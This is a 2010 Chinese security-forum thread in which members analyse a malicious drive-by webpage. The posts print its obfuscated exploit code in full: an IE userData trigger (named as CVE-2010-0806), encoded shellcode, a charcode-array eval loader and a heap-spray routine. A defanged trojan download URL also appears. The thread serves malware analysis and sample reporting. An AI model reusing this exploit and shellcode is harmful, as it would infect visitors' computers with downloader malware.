收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 1x(对于本菜鸟,这个挂马网页算是比较复杂的...)
12下一页
返回列表 发新帖
查看: 3060|回复: 10
收起左侧

[已鉴定] 1x(对于本菜鸟,这个挂马网页算是比较复杂的...)

[复制链接]
幸福的猪猪
发表于 2010-3-22 08:07:59 | 显示全部楼层 |阅读模式
本帖最后由 幸福的猪猪 于 2010-3-22 09:00 编辑
hxxp://aawmdwa3.info/demo.htm

  2. <html><body>
  3. <button id='yEcOINWqzAvRosxxYgfclJYYclNTLbYCYFtXENkMxhsYvkGkpiwAZqiGoKePsqQqkxgBXxZQKYzdhiEfqwBXZjZwQp' onclick='WzdLiWKZevlgmLyiBITcqfDodayoljhqyoEwCJBe();' style='display:none'></button>
  4. <script src='party.css'></script>
  5. <script src='css.css'></script>
  6. <script src='js.css'></script>
  7. <script language='javascript'>
  8. function WzdLiWKZevlgmLyiBITcqfDodayoljhqyoEwCJBe(){
  9. QNQNDmaCfNTEcimgJjTuVLmpeJsyueyrYVPFdrRLPPSSkezSjRdhdOrPcuqvfBjpkxIlVrbmyuzxPnyCXyeuHonuBQXKBY();

  11. var mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv = document.createElement('body');
  12. mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv['addBehavior']('#default#userData');
  13. document['appendChild'](mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv);
  14. try {
  15.   for (tQknUbSupHPbocFX=0; tQknUbSupHPbocFX<10; tQknUbSupHPbocFX++) {
  16. mNkQBGGxtqlghauiaUpjbyCOjIVbnWnqDQBAuhOv.setAttribute('s',window);
  17.   }
  18. } catch(e){ }
  19. window.status+='';
  20. }
  21. document.getElementById('yEcOINWqzAvRosxxYgfclJYYclNTLbYCYFtXENkMxhsYvkGkpiwAZqiGoKePsqQqkxgBXxZQKYzdhiEfqwBXZjZwQp').onclick();
  22. </script></body></html>

复制代码

hxxp://aawmdwa3.info/party.css


  3. var hua, hua1, hua2, hua3, hua4;
  4. hua='\x25';    var kao='\x25';   var shit='\x25'; var jj=hua+'u'+'4B5B';  var cao='\x25';
  5. hua1='u';     kao+='u';    shit+='u';  var kk=hua+'u'+'CD36';  cao+='u';
  6. hua2='58';    kao+='B';    shit+='B';  var ll=hua+'u'+'BD8F';  cao+='B';
  7. hua3=hua+hua1+'5';    kao+='D';    shit+='D';  var mm=hua+'u'+'E9D0';  cao+='DD';
  8. hua4=hua3+'8'+'58%'+hua1+hua2+hua2; kao+='BC';       shit+='B';shit+='D'; var oo=hua+'u'+'FB7A';  cao+='7';

  10.         var WMAHWM='BAHWM4627AHWMA';

  12. var LHAH=hua3+'8'+'5'+'8'+hua+hua1+hua2+hua2+'%u10EB'+jj+'%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%'+'u';var HHAH='05EB%'+'uEBE8%uFFFF%u54FF%uBEA3'+shit+'%uD9E2%u8D1C'+shit+'%';
  13. var SSAH='u36BD%uB1FD'+kk+'%u10A1%'+'uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%'+'u2DBD'+'%';
  14. var oah='u455F%u8ED5'+ll+'%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%u';
  15. var org='u2355%uBDBF%'+'u';
  16. oah+='BDBC%u36BD%uD755%uE4B8%'+org+'5FBD%uD544%uD3D2'+shit+'%';
  17.   var org1='%'+'uD2D5%uBDD3%';
  18. oah+='uC8D5%uD1CF'+mm+'%uAB42%u7D38%uAEC8'+org1+'uD5BD%uCFC8%uD0D1%u36E9';
  19.    var org2='uD355%'+'uBDBF%';
  20. oah+='%uB1FB%u3355'+kao+'%u36BD%uD755%uE4BC%'+org2+'u5FBD%';
  21.     var org3='%'+'u8ED1%uBD8F%'+'u';
  22. oah+='uD544'+org3+'CED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2'+shit+'%u';
  23.      var org4='5E4%'+'uBFF';
  24. oah+='5536%uBCD7%u5'+org4+'2'+shit+'%u445F%u513C%uBCBD'+shit+'%';
  25.       var org5='uBDD7%'+'uA7D7%';
  26. oah+='u6136%u7E3C%uBD3D'+shit+'%'+org5+'uD7EE%';
  27.      var org6='uC8BD%u7A44%'+'u';
  28. oah+='u42BD%uE1EB%u7D8E%u3DFD%uBE81%'+org6+'BEB9%uDBE1%uD893%';
  29.     var org7='C5%'+'uBDBD%u748E%'+'uEC';
  30. oah+='uF97A%uB9BE%uD8'+org7+'EC%uEAEE%u8EEC%u367D%uE5FB%';
  31.    var org8='uBDBC%'+'u3EBD%uBD';
  32. oah+='u9F55%'+org8+'45%u1E54'+shit+'%u2DBD%uBDD7%uBDD7%uBED7%';
  33.   var org9='EE7D%uFB36%'+'u55';
  34. oah+='uBDD7%uBFD7%uBDD5'+shit+'%u'+org9+'99%uBCBC'+shit+'%';
  35.   var org10='7DD%uEDBD%'+'uEB42%u3495%'+'uD';
  36. oah+='uFB34%uD'+org10+'9FB%uFB36%uD7DD%uD7BD%uD7BD%';
  37.    var org11='BD%uEB42%'+'uD791%uD';
  38. oah+='uD7BD%uD7B9%uED'+org11+'7BD%uD7BD%uD5BD%uBDA2%uBDB2%';
  39.     var org12='u36C5%'+'uD9F3%uC13D%u4';
  40. oah+='u42ED%u81EB%uFB34%'+org12+'2B5%uC909%u3DB1%uB5C1%';
  41. oah+='uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B'+shit+'%u7ABD%uCDFB'+shit+'%u';
  42. oah+='BDBD'+oo+'%uBDC9'+shit+'%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%';
  43. oah+='u42ED%u85EB%u3B36%uBD3D'+shit+'%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u4';
  44. oah+='2DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uB';
  45. oah+='FBD'+shit+'%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364';
  46. oah+='E%u3671%'+'u3E64%uAD7E%'+'u7D8E%uECED%uEDEE%uEDED%uEDED%uEAE';
  47. oah+='D%uEDED%uEB42%u36B5%uE9C3%uAD55'+kao+'%u55BD%uBDD8'+shit+'%uD';
  48. oah+='ED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955'+shit+'%u3';
  49. oah+='4BD%u81FB%u1CD9%uBDB9'+shit+'%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%';
  50. oah+='uADFB%uB555'+shit+'%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%';
  51. oah+='u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B5';
  52. oah+='5'+shit+'%u7EBD%u1D55'+shit+'%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E'+shit+'%u5';
  53. oah+='13C%uBCBD'+shit+'%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%';
  54. oah+='uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A8';
  55. oah+='4%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uF';
  56. oah+='A7A%u259D%uADB7%uD945%u8D1C'+shit+'%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD';
  57. oah+='74A%uE4B9%uE955'+shit+'%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36';
  58. oah+='E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88'+shit+'%u445F%u428E%u42EA%uB9EB%uBF56%u7E';
  59. oah+='E5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7';
  60. oah+='E%u6136%uD7EE%uD5FD%uADBD'+shit+'%u36EA%u9DFB%uA555%u4242%uE542%uEC7';
  61. oah+='E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB26';
  62. oah+='6%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE33';
  63. oah+='6%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u';
  64. oah+='673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA37';
  65. oah+='6%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u18';
  66. oah+='4D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%u';

  68. var oaho='ADB7AHWM3D45AHWM126'+WMAHWM+'8EEAHWMd5dbAHWMc9c9AHWM87cdAHWM9292AHWMcad6AHWMdcdcAHWMdcd9AHWMd493AHWMdbd3AHWM92d2AHWMd2d9AHWMd3caAHWMd893AHWMd8c5AHWMbdbd';
复制代码

木马下载地址:(上面这段代码的密匙:BD) 又是这个BT的下载者。O(∩_∩)O~
样本上报卡巴斯基安全实验室。
[KLAN-65729446]


hxxp://kwaada.info/down.exe
回复

举报

幸福的猪猪
 楼主| 发表于 2010-3-22 08:10:09 | 显示全部楼层
本帖最后由 幸福的猪猪 于 2010-3-22 08:12 编辑

另外两个网址代码。。。

hxxp://aawmdwa3.info/css.css
  1. var sss = Array(472,388,456,128,260,312,288,276,292,244,444,388,416,444,184,456,404,448,432,388,396,404,160,188,260,288,348,308,188,412,256,128,136,148,468,136,164,236,128,472,388,456,128,356,332,476,320,468,328,476,416,344,312,488,260,260,304,292,328,480,480,432,292,360,472,312,308,280,292,464,448,448,280,264,268,276,396,432,392,344,412,316,348,260,356,300,424,396,428,288,296,488,452,316,324,432,464,476,476,408,312,452,316,268,332,272,324,432,484,440,244,468,440,404,460,396,388,448,404,160,304,288,260,288,172,288,288,260,288,172,332,332,260,288,172,444,388,416,172,260,312,288,276,292,164,236,476,408,308,348,264,440,460,280,392,468,460,432,460,456,328,480,440,324,356,404,312,336,316,480,488,304,436,312,452,400,432,488,288,336,340,436,340,308,312,316,324,452,260,472,464,392,452,296,268,260,456,392,360,272,424,436,404,280,412,128,244,128,440,404,476,128,260,456,456,388,484,160,164,236,472,388,456,128,312,304,292,292,316,388,348,276,348,452,128,244,128,192,480,224,216,192,192,192,180,160,356,332,476,320,468,328,476,416,344,312,488,260,260,304,292,328,480,480,432,292,360,472,312,308,280,292,464,448,448,280,264,268,276,396,432,392,344,412,316,348,260,356,300,424,396,428,288,296,488,452,316,324,432,464,476,476,408,312,452,316,268,332,272,324,432,484,440,184,432,404,440,412,464,416,168,200,164,236,472,388,456,128,400,460,308,428,400,396,448,456,392,456,468,292,292,396,284,432,448,452,332,440,476,340,296,476,340,308,356,336,300,332,472,128,244,128,468,440,404,460,396,388,448,404,160,156,148,468,192,396,192,396,148,468,192,396,192,396,156,164,236,476,416,420,432,404,160,400,460,308,428,400,396,448,456,392,456,468,292,292,396,284,432,448,452,332,440,476,340,296,476,340,308,356,336,300,332,472,184,432,404,440,412,464,416,240,312,304,292,292,316,388,348,276,348,452,188,200,164,492,400,460,308,428,400,396,448,456,392,456,468,292,292,396,284,432,448,452,332,440,476,340,296,476,340,308,356,336,300,332,472,172,244,400,460,308,428,400,396,448,456,392,456,468,292,292,396,284,432,448,452,332,440,476,340,296,476,340,308,356,336,300,332,472,236,500,472,388,456,128,480,312,312,468,436,288,468,320,444,428,396,452,432,452,460,444,404,396,316,416,396,280,340,260,304,424,276,360,324,400,472,288,476,408,408,264,276,456,336,308,416,420,476,388,312,288,464,264,452,272,304,356,488,456,420,128,244,128,400,460,308,428,400,396,448,456,392,456,468,292,292,396,284,432,448,452,332,440,476,340,296,476,340,308,356,336,300,332,472,184,460,468,392,460,464,456,420,440,412,160,192,256,312,304,292,292,316,388,348,276,348,452,188,200,164,236,400,404,432,404,464,404,128,400,460,308,428,400,396,448,456,392,456,468,292,292,396,284,432,448,452,332,440,476,340,296,476,340,308,356,336,300,332,472,236);

  3. var arr = new Array;
复制代码
hxxp://aawmdwa3.info/js.css
  1. function QNQNDmaCfNTEcimgJjTuVLmpeJsyueyrYVPFdrRLPPSSkezSjRdhdOrPcuqvfBjpkxIlVrbmyuzxPnyCXyeuHonuBQXKBY(){


  4. for (var i = 0; i < sss.length; i ++ ){
  5.   arr[i] = String.fromCharCode(sss[i]/4); }
  6.   var tQknUbSupHPbocFK=arr.toString();tQknUbSupHPbocFK=tQknUbSupHPbocFK.replace(/,/g, "");
  7.   tQknUbSupHPbocFK = tQknUbSupHPbocFK.replace(/@/g, ",");
  8. eval(tQknUbSupHPbocFK);

  10.   for(tQknUbSupHPbocFX=0; tQknUbSupHPbocFX<270; tQknUbSupHPbocFX++) {
  11.   wfMWBnsFbuslsrRxnQYeNTOxzLmNqdlzHTUmUMNOQqAvtbqJCArbZDjmeFg[tQknUbSupHPbocFX] = xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri + xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri + YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn;}
复制代码



这两份代码应该可以组成一个完整的挂马网页代码吧...呵呵,个人推测而已。
回复

举报

ryota
发表于 2010-3-22 08:50:43 | 显示全部楼层
CVE 2010-0806
回复

举报

250662772
发表于 2010-3-22 09:53:03 | 显示全部楼层
另外两个网址代码。。。




这两份代码应该可以组成一个完整的挂马网页代码吧...呵呵,个人推测而已。 ...
幸福的猪猪 发表于 2010-3-22 08:10

var ANHEI=oaho.replace(/AHWM/g, "%u"); var YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn=unescape(LHAH+HHAH+SSAH+oah+ANHEI);wfMWBnsFbuslsrRxnQYeNTOxzLmNqdlzHTUmUMNOQqAvtbqJCArbZDjmeFg = new Array();var NLIIOaWEWq = 0x86000-(YSwPuRwhVNzAALIRxxlIZvNMFItppFBCEclbVgOWAYKjckHJzqOQltwwfNqOCSDQlyn.length*2);var dsMkdcprbruIIcGlpqSnwUJwUMYTKSv = unescape('%u0c0c%u0c0c');while(dsMkdcprbruIIcGlpqSnwUJwUMYTKSv.length<NLIIOaWEWq/2){dsMkdcprbruIIcGlpqSnwUJwUMYTKSv+=dsMkdcprbruIIcGlpqSnwUJwUMYTKSv;}var xNNumHuPokcqlqsoecOhcFUALjEZQdvHwffBErTMhiwaNHtBqDLYzri = dsMkdcprbruIIcGlpqSnwUJwUMYTKSv.substring(0,NLIIOaWEWq/2);delete dsMkdcprbruIIcGlpqSnwUJwUMYTKSv;
回复

举报

幸福的猪猪
 楼主| 发表于 2010-3-22 10:36:48 | 显示全部楼层
本帖最后由 幸福的猪猪 于 2010-3-22 10:38 编辑

回复 4# 250662772

谢谢斑竹的指点,我早上光看SHELLCODE代码了,没想到要解析这个挂马网页的突破口原来在这段代码里面。

p.s. 早上,解析那段shellcode的时候,我还以为那些多出来的代码是没有用处的...惭愧惭愧。


还有一点事情要请教,那些个十进制的代码(好像是十进制代码)要怎么弄。。。
回复

举报

post8
头像被屏蔽
发表于 2010-3-22 10:49:57 | 显示全部楼层
avast kil
回复

举报

basketmn
头像被屏蔽
发表于 2010-3-22 11:09:07 | 显示全部楼层
回复 5# 幸福的猪猪
就是和下面那段放在一起执行下,也可以把数组里的元素都除以4  然后ascii码转换为字符
回复

举报

幸福的猪猪
 楼主| 发表于 2010-3-22 13:18:31 | 显示全部楼层
回复 7# basketmn

谢谢你,解除我的疑惑。
回复

举报

jason_jiang
发表于 2010-3-22 13:21:28 | 显示全部楼层
样本
panda报CI
回复

举报

juhone
发表于 2010-3-22 14:14:14 | 显示全部楼层
网盾拦
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 02:20 , Processed in 0.144411 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表